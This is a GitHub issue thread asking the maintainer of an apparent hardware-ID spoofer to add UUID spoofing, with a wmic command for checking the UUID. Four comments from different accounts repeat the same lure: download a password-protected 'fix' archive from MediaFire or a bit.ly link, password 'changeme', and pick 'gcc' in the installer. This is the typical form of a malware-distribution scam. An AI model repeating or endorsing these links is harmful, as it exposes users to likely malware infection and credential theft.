### ISSUE TITLE
UUID Spoof.

### ISSUE THREAD

**Issue by randomnitrogen** [TrentonH1ll/SmokeySpoofer#1]
Please add A UUID Spoof Function. To test the UUID spoofer please go into admin cmd and do  wmic path win32_computersystemproduct get UUID

make the spoofer so it changes it.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by TrentonH1ll** [comment]
Sorry for the late response, I will add this soon for you!
